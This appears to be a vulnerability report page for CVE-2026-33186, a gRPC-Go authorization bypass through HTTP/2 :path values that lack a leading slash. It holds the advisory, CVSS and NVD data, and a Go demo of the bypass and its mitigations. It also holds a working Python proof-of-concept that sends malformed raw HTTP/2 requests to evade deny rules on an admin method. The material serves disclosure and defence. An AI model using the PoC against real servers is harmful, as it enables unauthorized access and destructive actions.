Security Vulnerability Report
CVE-2026-33186 CVSS 9.1 CRITICAL

CVE-2026-33186

Published: 2026-03-20 23:16:45
Last Modified: 2026-04-10 20:49:18

Description

gRPC-Go is the Go language implementation of gRPC. Versions prior to 1.79.3 contain an authorization bypass caused by improper input validation of the HTTP/2 `:path` pseudo-header. The server's routing logic was too lenient: it accepted requests whose `:path` omitted the mandatory leading slash (e.g., `Service/Method` instead of `/Service/Method`). The server still routed such requests to the correct handler, but authorization interceptors (including the official `grpc/authz` package) evaluated the raw, non-canonical path string. "Deny" rules written against canonical paths (starting with `/`) therefore failed to match, and the request fell through to any fallback "allow" rule.

Two conditions must both hold for a server to be affected: it uses a path-based authorization interceptor, such as the official RBAC implementation in `google.golang.org/grpc/authz` or a custom interceptor that relies on `info.FullMethod` or `grpc.Method(ctx)`; and its policy contains specific "deny" rules for canonical paths while allowing other requests by default (a fallback "allow" rule). The vulnerability is exploitable by an attacker who can send raw HTTP/2 frames with malformed `:path` headers directly to the gRPC server.

The fix in version 1.79.3 rejects any request whose `:path` does not start with a leading slash with a `codes.Unimplemented` error, so it never reaches authorization interceptors or handlers with a non-canonical path string. Upgrading is the most secure and recommended path. Where that is not immediately possible, the advisory lists three mitigations: a validating interceptor that rejects non-canonical paths before authorization runs (the recommended mitigation); infrastructure-level normalization of `:path` in front of the server; and/or policy hardening (the bypass depends on a fallback "allow" rule matching the unrecognised path).
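The bypass and the mitigations above, as an added stdlib-only Go example that is not part of the advisory or of gRPC-Go itself. The policy JSON is constructed to follow the `grpc/authz` allow/deny rule shape (an assumption about the schema; the evaluator here is a toy, not the library's code), `ErrUnimplemented` stands in for `status.Error(codes.Unimplemented, ...)` so the example builds without the grpc module, and the structural check beyond the leading slash in `ValidateFullMethod` is this example's own hardening, not the 1.79.3 fix:

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// Rule is one allow/deny entry. Field names follow the grpc/authz policy JSON
// (assumption about the schema; the evaluator below is a toy, not the library's).
type Rule struct {
	Name    string `json:"name"`
	Request struct {
		Paths []string `json:"paths"`
	} `json:"request"`
}

// Policy is a deny-then-allow RBAC policy of the kind the advisory describes.
type Policy struct {
	Name       string `json:"name"`
	AllowRules []Rule `json:"allow_rules"`
	DenyRules  []Rule `json:"deny_rules"`
}

// Constructed example policy: a specific deny on the canonical admin path plus a
// fallback "allow everything" rule. This is exactly the shape that is bypassable.
const VulnerablePolicyJSON = `{
  "name": "toy-authz",
  "deny_rules":  [{"name": "deny_delete_user", "request": {"paths": ["/AdminService/DeleteUser"]}}],
  "allow_rules": [{"name": "allow_rest",       "request": {"paths": ["*"]}}]
}`

// Constructed hardened policy ("policy hardening"): no fallback allow, only the
// listed canonical paths are allowed, so an unmatched non-canonical path fails closed.
const HardenedPolicyJSON = `{
  "name": "toy-authz-default-deny",
  "allow_rules": [{"name": "allow_read", "request": {"paths": ["/UserService/GetUser"]}}]
}`

// LoadPolicy parses a policy document of the shape above.
func LoadPolicy(raw string) (*Policy, error) {
	var p Policy
	if err := json.Unmarshal([]byte(raw), &p); err != nil {
		return nil, err
	}
	return &p, nil
}

// matchPath: "*" matches everything, a trailing "*" is a prefix match, anything
// else must match exactly. Note that the incoming path is NOT normalised.
func matchPath(pattern, path string) bool {
	if pattern == "*" {
		return true
	}
	if strings.HasSuffix(pattern, "*") {
		return strings.HasPrefix(path, strings.TrimSuffix(pattern, "*"))
	}
	return pattern == path
}

// Authorize evaluates deny rules first, then allow rules, on the raw method string
// an interceptor receives (info.FullMethod / grpc.Method(ctx) in real code).
func (p *Policy) Authorize(fullMethod string) bool {
	for _, r := range p.DenyRules {
		for _, pat := range r.Request.Paths {
			if matchPath(pat, fullMethod) {
				return false
			}
		}
	}
	for _, r := range p.AllowRules {
		for _, pat := range r.Request.Paths {
			if matchPath(pat, fullMethod) {
				return true
			}
		}
	}
	return false
}

// ErrUnimplemented stands in for status.Error(codes.Unimplemented, ...), which is
// what the 1.79.3 server (and a validating interceptor) returns; stdlib-only here.
var ErrUnimplemented = errors.New("rpc error: code = Unimplemented desc = malformed method name")

// ValidateFullMethod is the "validating interceptor" mitigation: reject anything
// that does not look like "/Service/Method" before authz ever sees it.
func ValidateFullMethod(fullMethod string) error {
	if !strings.HasPrefix(fullMethod, "/") { // this is the check 1.79.3 adds
		return ErrUnimplemented
	}
	// Extra structural check (this example's own hardening, beyond the advisory's
	// fix): require a non-empty service and method separated by a second slash.
	rest := fullMethod[1:]
	i := strings.IndexByte(rest, '/')
	if i <= 0 || i == len(rest)-1 {
		return ErrUnimplemented
	}
	return nil
}

// Decide models the server-side chain: optional validating interceptor, then authz.
func Decide(p *Policy, fullMethod string, validateFirst bool) (bool, error) {
	if validateFirst {
		if err := ValidateFullMethod(fullMethod); err != nil {
			return false, err
		}
	}
	return p.Authorize(fullMethod), nil
}

func main() {
	vuln, _ := LoadPolicy(VulnerablePolicyJSON)
	hard, _ := LoadPolicy(HardenedPolicyJSON)
	for _, path := range []string{"/AdminService/DeleteUser", "AdminService/DeleteUser"} {
		a, _ := Decide(vuln, path, false)
		b, err := Decide(vuln, path, true)
		c, _ := Decide(hard, path, false)
		fmt.Printf("%-26q vulnerable=%-5v validating=%-5v (%v) default-deny=%v\n", path, a, b, err, c)
	}
}
```

Running it shows the three outcomes side by side: the deny rule blocks `/AdminService/DeleteUser` but `AdminService/DeleteUser` sails through to the wildcard allow (the bug); the validating interceptor rejects the non-canonical form with Unimplemented before the policy is consulted; and the default-deny policy fails closed on it even without validation.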

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:grpc:grpc:*:*:*:*:*:go:*:* - VULNERABLE
gRPC-Go < 1.79.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import ssl

import h2.connection
import h2.events


def send_malformed_grpc(host, port, service, method, use_tls=False):
    """
    PoC to demonstrate authorization bypass via malformed :path header.
    Sends a request without the leading slash to bypass deny rules and
    returns the grpc-status the server answered with (None if it sent none).
    """
    sock = socket.create_connection((host, port))
    if use_tls:
        # gRPC over TLS negotiates HTTP/2 via ALPN; needed for port 443.
        ctx = ssl.create_default_context()
        ctx.set_alpn_protocols(["h2"])
        sock = ctx.wrap_socket(sock, server_hostname=host)

    h2_conn = h2.connection.H2Connection()
    h2_conn.initiate_connection()
    sock.sendall(h2_conn.data_to_send())

    # Malformed path: 'Service/Method' instead of '/Service/Method'
    path = f"{service}/{method}"
    headers = [
        (':method', 'POST'),
        (':path', path),
        (':scheme', 'https' if use_tls else 'http'),
        (':authority', host),
        ('content-type', 'application/grpc'),
        ('te', 'trailers'),
    ]
    h2_conn.send_headers(1, headers, end_stream=True)
    sock.sendall(h2_conn.data_to_send())
    print(f"[+] Sent request with malformed path: {path}")

    # Read the response. grpc-status arrives in the HEADERS frame (trailers-only
    # response) or in the trailers:
    #   12 (Unimplemented)    -> rejected as malformed (patched server or validating interceptor)
    #    7 (PermissionDenied) -> the authz interceptor matched a deny rule
    #   anything else         -> the request got past authorization to routing/handler
    grpc_status = None
    done = False
    while not done:
        data = sock.recv(65535)
        if not data:
            break
        for event in h2_conn.receive_data(data):
            if isinstance(event, (h2.events.ResponseReceived, h2.events.TrailersReceived)):
                for name, value in event.headers:
                    # h2 delivers bytes by default, str with an older header_encoding setting
                    if isinstance(name, bytes):
                        name, value = name.decode(), value.decode()
                    if name == 'grpc-status':
                        grpc_status = int(value)
            elif isinstance(event, (h2.events.StreamEnded, h2.events.StreamReset)):
                done = True
        sock.sendall(h2_conn.data_to_send())

    print(f"[+] Server answered grpc-status: {grpc_status}")
    print("[+] Anything other than 12 or 7 means the request was processed despite authorization policies.")
    sock.close()
    return grpc_status


# Usage Example
# send_malformed_grpc("target.com", 443, "AdminService", "DeleteUser", use_tls=True)
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33186",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T23:16:45.180",
    "lastModified": "2026-04-10T20:49:17.737",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "gRPC-Go is the Go language implementation of gRPC. Versions prior to 1.79.3 have an authorization bypass resulting from improper input validation of the HTTP/2 `:path` pseudo-header. The gRPC-Go server was too lenient in its routing logic, accepting requests where the `:path` omitted the mandatory leading slash (e.g., `Service/Method` instead of `/Service/Method`). While the server successfully routed these requests to the correct handler, authorization interceptors (including the official `grpc/authz` package) evaluated the raw, non-canonical path string. Consequently, \"deny\" rules defined using canonical paths (starting with `/`) failed to match the incoming request, allowing it to bypass the policy if a fallback \"allow\" rule was present. This affects gRPC-Go servers that use path-based authorization interceptors, such as the official RBAC implementation in `google.golang.org/grpc/authz` or custom interceptors relying on `info.FullMethod` or `grpc.Method(ctx)`; AND that have a security policy contains specific \"deny\" rules for canonical paths but allows other requests by default (a fallback \"allow\" rule). The vulnerability is exploitable by an attacker who can send raw HTTP/2 frames with malformed `:path` headers directly to the gRPC server. The fix in version 1.79.3 ensures that any request with a `:path` that does not start with a leading slash is immediately rejected with a `codes.Unimplemented` error, preventing it from reaching authorization interceptors or handlers with a non-canonical path string. While upgrading is the most secure and recommended path, users can mitigate the vulnerability using one of the following methods: Use a validating interceptor (recommended mitigation); infrastructure-level normalization; and/or policy hardening."},
      {"lang": "es", "value": "gRPC-Go is the Go language implementation of gRPC. Versions prior to 1.79.3 have an authorization bypass resulting from incorrect input validation of the HTTP/2 `:path` pseudo-header. The gRPC-Go server was too lenient in its routing logic, accepting requests where the `:path` omitted the mandatory leading slash (for example, `Service/Method` instead of `/Service/Method`). Although the server successfully routed these requests to the correct handler, the authorization interceptors (including the official `grpc/authz` package) evaluated the raw, non-canonical path string. Consequently, \"deny\" rules defined using canonical paths (beginning with `/`) failed to match the incoming request, allowing it to bypass the policy if a fallback \"allow\" rule was present. This affects gRPC-Go servers that use path-based authorization interceptors, such as the official RBAC implementation in `google.golang.org/grpc/authz` or custom interceptors that depend on `info.FullMethod` or `grpc.Method(ctx)`; AND that have a security policy containing specific \"deny\" rules for canonical paths but allowing other requests by default (a fallback \"allow\" rule). The vulnerability is exploitable by an attacker who can send raw HTTP/2 frames with malformed `:path` headers directly to the gRPC server. The fix in version 1.79.3 ensures that any request with a `:path` that does not begin with a leading slash is immediately rejected with a `codes.Unimplemented` error, preventing it from reaching the authorization interceptors or handlers with a non-canonical path string. While upgrading is the most secure and recommended path, users can mitigate the vulnerability using one of the following methods: use a validating interceptor (recommended mitigation); infrastructure-level normalization; and/or policy hardening."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:grpc:grpc:*:*:*:*:*:go:*:*", "versionEndExcluding": "1.79.3", "matchCriteriaId": "D5AB3ED0-D11B-461E-B2B1-627D5CCEA2 ... (truncated)
```